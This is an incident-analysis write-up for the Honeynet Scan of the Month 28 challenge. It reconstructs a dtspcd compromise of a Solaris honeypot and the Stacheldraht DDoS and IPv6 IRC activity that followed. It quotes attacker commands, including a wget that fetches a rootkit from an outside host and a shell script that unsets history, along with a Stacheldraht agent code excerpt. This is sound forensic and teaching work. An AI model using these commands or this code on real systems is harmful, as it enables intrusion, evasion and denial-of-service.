Honeynet Scan of the Month 28

May 2003



author
Fabio Vayr
Employed @ SCC ITALIA S.R.L.
http://www.scc-it.it
http://www.securegroup.it

Introduction


"This month's challenge is to analyze a successful compromise and the attacker's actions after it."

The Challenge:

Members of the AT&T Mexico Honeynet captured a unique attack. As common, what is interesting is not how the attackers broke in, but what they did afterwards. Your mission is to analyze the network capture of the attacker's activity and decode the attacker's actions. There are two binary log files. Day1 captured the break in, Day3 captures some unique activity following the compromise. The honeypot in question is IP 192.168.100.28.


Tools


I used the following tools to accomplish my analysis, running them under Debian Woody 3.0:


Q & A


            First Step

Questions:
  1. What is the operating system of the honeypot? How did you determine that? (see day1)
       Answer #1
  2. How did the attacker(s) break into the system? (see day1)
       Answer #2
  3. Which systems were used in this attack, and how?(see day1)
       Answer #3
  4. Create a diagram that demonstrates the sequences involved in the attack. (see day1)
       Answer #4
  5. What is the purpose/reason of the ICMP packets with 'skillz' in them? (see day1)
       Answer #5
  6. Following the attack, the attacker(s) enabled a unique protocol that one would not expect to find on a n IPv4 network. Can you identify that protocol and why it was used? (see day3)
       Answer #6
  7. Can you identify the nationality of the attacker? (see day3)
       Answer #7
Bonus Question:

First Step

First of all I verified what I have downloaded.

$ echo "79e5871791542c8f38dd9cee2b2bc317  day1.log.gz" > check.md5
$ echo "af8ab95f41530fe3561b506b422ed636  day3.log.gz" >> check.md5
$ md5sum -vc check.md5
day1.log.gz    OK
day3.log.gz    OK	

Before trying to answer any question there are a few things to be done. First of all it could be useful to intercept and separate any TCP session using Tcpflow. This tool can give a quick idea of what happened around the honeypot since it can isolate almost any file transmitted over the network or it can group a session and make it more visible. In a nutshell Tcpflow does several times the gorgeous "Follow TCP Stream" one can find using ethereal.

$ mkdir tcpflow-day1 ; cd tcpflow-day1; tcpflow -r ../day1.log
$ mkdir tcpflow-day3 ; cd tcpflow-day3; tcpflow -r ../day3.log

Soon after I have used Snort 2.0 with the latest rules of signature (15th of May) using almost the default configuration file. The only difference was that I enabled all the groups of signatures to show up. In this way every SID could rise, even shellcode sginatures and ICMP traffic.

# snort -c ../rules/snort.conf -r day1.log -l /var/log/snort-2.0-DAY1.log/
# snort -c ../rules/snort.conf -r day3.log -l /var/log/snort-2.0-DAY3.log/

Below there are some statistics with some results:
(The arrows show the most sginificant things inside the boxes)

DAY1.LOG

Snort processed 18843 packets.
Breakdown by protocol:                Action Stats:

    TCP: 12773      (67.786%)         ALERTS: 2417
    UDP: 3948       (20.952%)         LOGGED: 2156
   ICMP: 2122       (11.261%)         PASSED: 0
    ARP: 0          (0.000%)
  EAPOL: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 0          (0.000%)

===============================================================================
TCP Stream Reassembly Stats:
   TCP Packets Used:      237        (1.258%)
   Reconstructed Packets: 0          (0.000%)
   Streams Reconstructed: 31
===============================================================================


# grep '\[\*\*\]' /var/log/output-snort-2.0.0-DAY1.log/alert |sort |  uniq -c | sort -n

      1 [**] [1:1790:2] CHAT IRC dns response [**]
      1 [**] [1:615:3] SCAN SOCKS Proxy attempt [**]
      1 [**] [1:645:3] SHELLCODE sparc NOOP [**]			    <------
      4 [**] [1:618:2] SCAN Squid Proxy attempt [**]
      4 [**] [1:620:2] SCAN Proxy (8080) attempt [**]
      5 [**] [1:524:5] BAD TRAFFIC tcp port 0 traffic [**]
      9 [**] [116:56:1] (snort_decoder): T/TCP Detected [**]
      9 [**] [1:384:4] ICMP PING [**]
     10 [**] [1:402:4] ICMP Destination Unreachable (Port Unreachable) [**]
    201 [**] [1:368:4] ICMP PING BSDtype [**]
    210 [**] [1:408:4] ICMP Echo Reply [**]
   1692 [**] [1:1855:2] DDOS Stacheldraht agent->handler (skillz) [**]        <------


DAY3.LOG

Snort processed 123123 packets.
Breakdown by protocol:                Action Stats:

    TCP: 105973     (86.071%)         ALERTS: 86656	
    UDP: 3896       (3.164%)          LOGGED: 86657
   ICMP: 7592       (6.166%)          PASSED: 0
    ARP: 0          (0.000%)
  EAPOL: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 5662       (4.599%)			       <------

===============================================================================
TCP Stream Reassembly Stats:
   TCP Packets Used:      233        (0.189%)
   Reconstructed Packets: 0          (0.000%)
   Streams Reconstructed: 11
===============================================================================


# grep '\[\*\*\]' /var/log/output-snort-2.0.0-DAY3.log/alert |sort |  uniq -c | sort -n

      1 [**] [116:56:1] (snort_decoder): T/TCP Detected [**]
      1 [**] [1:1257:4] DOS Winnuke attack [**]
      1 [**] [1:1394:3] SHELLCODE x86 NOOP [**]
      1 [**] [1:1790:2] CHAT IRC dns response [**]
      1 [**] [1:485:2] ICMP Destination Unreachable (Communication Administratively Prohibited) [**]
      5 [**] [1:1228:1] SCAN nmap XMAS [**]
      8 [**] [1:621:1] SCAN FIN [**]
     19 [**] [1:624:1] SCAN SYN FIN [**]
     20 [**] [1:625:1] SCAN XMAS [**]
     38 [**] [1:399:4] ICMP Destination Unreachable (Host Unreachable) [**]
     89 [**] [1:368:4] ICMP PING BSDtype [**]
    277 [**] [1:1856:2] DDOS Stacheldraht handler->agent (ficken) [**]                <------ 
    278 [**] [1:408:4] ICMP Echo Reply [**]
    287 [**] [1:1854:2] DDOS Stacheldraht handler->agent (niggahbitch) [**]           <------ 
    662 [**] [1:404:4] ICMP Destination Unreachable (Protocol Unreachable) [**]
    748 [**] [1:402:4] ICMP Destination Unreachable (Port Unreachable) [**]
   1198 [**] [1:449:4] ICMP Time-To-Live Exceeded in Transit [**]
   1796 [**] [1:1855:2] DDOS Stacheldraht agent->handler (skillz) [**]
   2218 [**] [1:384:4] ICMP PING [**]
  79008 [**] [1:241:2] DDOS shaft synflood [**]                   <------

As one can see tons of informations are included in the two boxes above.
We have a clear shellcode NOOP slide for SPARC, a clear reference to a DDOS tool, a few port scans and at last even the evidence of a Distribuited DOS attack that I will discuss later.


Answer #1

The operating system of the honeypot seems to be a Solaris 5.8 running on his native enviroment "Sun/SPARC"

There are a lot of clues that made me point towards this direction. First of all if we take a look at the MAC address of the network interface of the honeypot we can use the first six bytes to associate the producer of the hardware to the NI.

MAC address: 08:00:20:d1:76:19   --->   SunMicro_d1:76:19.

Obviously this is not enough.
Let's look at the contents inside the directory created and filled with Tcpflow. Here I found two lines similar to these which indicate that the attacker has uploaded at least two SUN binaries (SPARC architecture) to the honeypot.

062.211.066.016.00020-192.168.100.028.32784:
  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked (uses shared libs), stripped
  
062.211.066.016.00020-192.168.100.028.32786: 
  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked (uses shared libs), stripped

Even this clue could mean nothing but a further analysis showed that during the attack these binaries (called solbnc and wget) were used and worked well over the platform they were downloaded to.

The exploit successfully used during the attack has a built-in command which runs on Unix machines and which is very useful to identify the platform and to gather a lot of informations: "uname -a"
This is the response given by the honeypot

 #uname -a;
 SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10

Since this "banner" could easily be faked (don't forget we are on a honeypot) I needed something more reliable: the NMAP OS Fingerprint database. This is included in Ettercap which has a fantastic utility to use it offline. Adding a few bash commands I found my suppositions consistent.


# ettercap -O -d -N -T day1.log > day1.log.OS.FINGERPRINTING
$ sort day1.log.OS.FINGERPRINTING | uniq | grep [a-z] | sed s/\-\-\>//g | sed "s/: NL :"//g | grep [0-9]

     211.75.30.52  Linux 2.2.14 - 2.2.20
     62.211.66.16  FreeBSD 4.5
     66.28.103.87  Linux 2.4.xx
     67.36.28.116  Windows 2000 / XP
     80.117.14.44  Windows XP Pro
    192.18.99.122  SunOS 5.8
    203.239.31.60  Windows ME / 2000 / XP
    203.69.233.93  Linux 2.2.14 - 2.2.20
    24.167.44.129  Windows XP Pro, Windows 2000 Pro
    61.219.90.180  Linux 2.4.xx
    61.221.179.26  Linux 2.2.14 - 2.2.20
    64.231.37.135  Windows 2000
   192.168.100.28  Solaris 7 / 8			<-----
   211.214.125.74  Windows ME / 2000 / XP
   61.144.145.243  Windows 2000 Server - Windows XP SP1
   64.160.228.206  Windows ME / 2000 / XP
   67.195.152.135  Windows 2000 Pro
  206.252.192.195  Cisco IOS


# ettercap -O -d -N -T day3.log > day3.log.OS.FINGERPRINTING
$ sort day3.log.OS.FINGERPRINTING | uniq | grep "^ -->" | grep -v ": $" | sed s/\-\-\>//g | sed "s/: NL :"//g

    61.221.179.26  Linux 2.2.14 - 2.2.20
    80.117.14.222  Windows XP Pro
   192.114.144.52  Linux 2.4.xx
   192.168.100.28  Solaris 8				<-----
   195.130.233.20  Linux 2.4.xx
   205.177.13.231  Linux 2.4.xx
   213.157.130.12  Windows 2000
  166.130.113.157  Windows 9x
  206.252.192.195  Cisco IOS  

Ok now I am pretty sure the honeypot box runs Solaris 5.8 as operating system.


Answer #2

Solaris8 Sparc was remotely compromised with the dtspcd exploit.


Since there is no sense in reinventing the wheel I won't explain how this exploit works.
This job has already been done very well during the Scan of te Month 20.
There is a complete analysis here: http://project.honeynet.org/scans/scan20/scan20.html
Other sources of information can be found here at CERT.ORG: http://www.cert.org/advisories/CA-2001-31.html
The same first packet of the exploit can be found here and inside "day1.log". A similar response will follow.

The attack originally came from the IP address: 61.219.90.180 and was originated the 29 of November 2002


Answer #3

The machine which runs the attack seems to be a Linux box (61.219.90.180 - Linux 2.4.xx)

After having succeded in the attack and having checked the presence of the BackDoor Shell (BD PID(s): 1773) the attacker uses one FTP server to download Solaris binaries or shell scripts.
wget
dlp
solbnc
ipv6sun

Soon after the attacker downloads and installs a Solaris rootkit which can be found here (sol.tar.gz)

# ./wget http://62.211.66.53/bobzz/sol.tar.gz

Then he/she cleans the Logs and patches the Solaris box using these patches 111085-02.zip and 108949-07.zip to make the box unvulenerable.

At last he/starts the PsyBNC IRC tool (psy.tar)

# ./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-.  ,-.,---.,--. ,-.,----. 
 |  O ||  ,-' \ \/ / | o ||   \| || ,--' 
 |  _/ _\  \   \  /  | o< | |\   || |__  
 |_|  |____/   |__|  |___||_|  \_| \___| 
      Version 2.2.1 (c) 1999-2000
              the most psychoid          
      and  the cool lam3rz Group IRCnet  
                                         
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
^[[1;37m*^[[0;37m psyBNC installed - loaded on reboot :>
# cd ..
# ./solbnc

This sequence taken from day1.log shows how the inetd daemon changed his behaviuor soon after the exploit. These packets were probably originated for the syslog server of the honeypot

WARNING   	Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/dt/bin/rpc.cmsd: Killed
WARNING		Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/sbin/sadmind: Killed
ERROR		Nov 29 09:56:19 inetd[1773]: [ID 801587 daemon.error] /tmp/x: No such file or directory

This big filter below used on day3.log shows the SYN flooding attack in order, probably, to take the OPERATOR level on a specific IRC server.
As I have read from the IRC sessions logged in day3.log the attackers talk to coordinate their tools against a victim to litterally "TAKE" something.


!(((ipv6.addr eq 2001:750:2:0:202:a5ff:fef0:aac7) and (tcp.port eq 6667 and tcp.port eq 32780 )) 
or tcp.port eq 5001) and !((ip.addr eq 206.252.192.195 and ip.addr eq 192.168.100.28) 
and (tcp.port eq 5555 and tcp.port eq 32805)) and !((ip.addr eq 62.211.66.55 
and ip.addr eq 192.168.100.28) and (tcp.port eq 80 and tcp.port eq 32806))


Answer #4

This file contains the full sequence of the attack. (attack-sequence.txt)


Answer #5

The honeypot has become an agent (AKA zombie) of a DDOS tool called "stacheldraht". Packets containg the string 'skillz' are used to comunicate with the handlers to see if it is reacheable and alive.

A complete analysis of this tool can be found at http://staff.washington.edu/dittrich/misc/stacheldraht.analysis
You can look at source code of this tool here which was found 'googling' around the net. It is called stachel.tgz and runs on Linux and Solaris.
Here you can look at the first packet found in day1.log with 'skillz' on board. These packets start spreading from the honeypot the 29th of november 2002 at 15:59:52 UTC and are directed towards these two IP: 217.116.38.10 and61.134.3.11 which probably the program have found in the list of handlers.

Inside day3.log I found a lot of occurences of other keywords which can be found in the communication between handlers and agents. These keywords taken from ICMP packets follow the decision of the client of starting the DOS attack.

277   ficken
287   niggahbitch
1796  skillz  

A few words taken from Dittrich's analysis can clearly explain how the client works:

"Once the agent has determined a list of potential handlers, it then starts at the beginning of the list of handlers and sends an ICMP_ECHOREPLY packet with an ID field containing the value 666 and data field containing the string "skillz". If the master gets this packet, it sends back an ICMP_ECHOREPLY packet with an ID field containing the value 667 and data field containing the string "ficken". (It should be noted that there appears to be a bug that makes the handler and agent send out some large, e.g., >1000 byte, packets. The handler and agent continue periodically sending these 666|skillz / 667|ficken packets back and forth. This would be one way of detecting agents/masters by passively monitoring these ICMP packets.) "

Below there is an explanation of the network enviroment involved in the "Stacheldraht DDOS tool". Taken from Dittrich's analysis.


  The network: client(s)-->handler(s)-->agent(s)-->victim(s)
------------------------------------------------------------

The stacheldraht network is made up of one or more handler programs
("mserv.c") and a large set of agents ("leaf/td.c").  The attacker uses
an encrypting "telnet alike" program to connect to and communicate
with the handlers ("telnetc/client.c").  A stacheldraht network would
look like this:

                   +--------+             +--------+
                   | client |             | client |
                   +--------+             +--------+
                       |                      |
        . . . --+------+---------------+------+----------------+-- . . .
                |                      |                       |
                |                      |                       |
          +-----------+          +-----------+           +-----------+
          |  handler  |          |  handler  |           |  handler  |
          +-----------+          +-----------+           +-----------+
                |                      |                       |
                |                      |                       |
. . . ---+------+-----+------------+---+--------+------------+-+-- . . .
         |            |            |            |            |
         |            |            |            |            |
     +-------+    +-------+    +-------+    +-------+    +-------+
     | agent |    | agent |    | agent |    | agent |    | agent |
     +-------+    +-------+    +-------+    +-------+    +-------+

This is an abstract of the function "checkalive" included in the file "leaf/td.c". As you can see here the honeypot mirrors perfectly this behaviour sending ICMP packets with the word 'skillz' and the ID field set to 0x1a0a which is 666. The function checkalive opens a RAW socket to wait for the connection/response from the handler (master server) then it sends a ICMP ECHO_REPLY packet with ID 666 and the word 'skillz' to wake-up a response from the server. This function belongs to a loop which is set to repeat every 61 seconds separating each server of 10 seconds.

int checkalive(char *server)
{
 int listensocket;
 struct ippkt packet;
 int timeend;

 /* setup new socket to wait for mserver reply */
 listensocket=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
 fcntl(listensocket,F_SETFL,O_NONBLOCK);
 /* contact the masterserver */
 send_connect(inet_addr(server),666,"skillz");
 /* wait for the reply , about 10 seconds */
 timeend=time(NULL)+WAITTIMER;

 while (time(NULL)<timeend) {
//  bzero((void*)&packet,sizeof(struct ippkt));

  memset((void*)&packet,0,sizeof(struct ippkt));
  read(listensocket,(char*)&packet,sizeof(struct ippkt));
  if (ntohs(packet.icmpi.icmp_hun.ih_idseq.icd_id)==667) {
   serverworks=inet_addr(server);
   close(listensocket);
   return(1);
  }
 }

 close(listensocket);
 return(0);
}


Answer #6

The protocol used is IPv6. It was used to setup an IRC server over the IPv6 protocol.

These are some of the address involved:
2001:6b8:0:400::5d0e
2001:750:2:0:202:a5ff:fef0:aac7

This is the script downloaded (ipv6sun) by the attacker that enables the Tunnel over an IPv4 network.

#!/bin/sh
unset HISTFILE
clear
echo "Inserisci il tuo ipv4"; read ipv4tuo; echo "..Okz"
echo "Inserisci l'ipv4 del TunnelBroker"; read ipv4server; echo "..Okz"
echo "tsrc ipv4tuo tdst ipv4server up" > /etc/hostname6.ip.tun0
echo ""
echo "Inserisci il tuo IPV6"; read ipv6tuo; echo "..Okz"
echo "Inserisci l'IPV6 dell'IRCServer"; read ipv6server; echo "..Okz"
echo "addif ipv6tuo ipv6server up" >> /etc/hostname6.ip.tun0
echo ""
echo "TermiNateD =)"
echo "maphia-Groups r0x again"

This is the full IRC session taken from day3.log using ethereal with the follwing filter:

(ipv6.addr eq 2001:750:2:0:202:a5ff:fef0:aac7 and ipv6.addr eq 2001:6b8:0:400::5d0e) 
    and (tcp.port eq 6667 and tcp.port eq 32780)


Answer #7

The attacker comes from Italy

This question was really easy for me since I am Italian too and I was able to follow all their IRC chats and to find even evidence of what they were doing throughout what they were talking about!
For example looking at this sample taken from an IRC session I could find the agreement to start the DDOS attack:

:PaKi!~ChMoD@nova.tu.chiba-u.ac.jp PRIVMSG #bobz :ok un sec
:bobz`!~ahaa@irc6.vhost.la PRIVMSG #bobz :apriamo sta dosnet o no? :D
:CoC4|n4!~ChMoD@62.101.108.86 PRIVMSG #bobz :sisiis
:CoC4|n4!~ChMoD@62.101.108.86 PRIVMSG #bobz :apriamo
:|AnDr34z|!~OmBr4@vhost.irc6.server.tb.ngnet.it PRIVMSG #bobz :oggi siamo in giornata di take ;)
:bobz`!~ahaa@irc6.vhost.la PRIVMSG #bobz :io apro quella ... là :Pp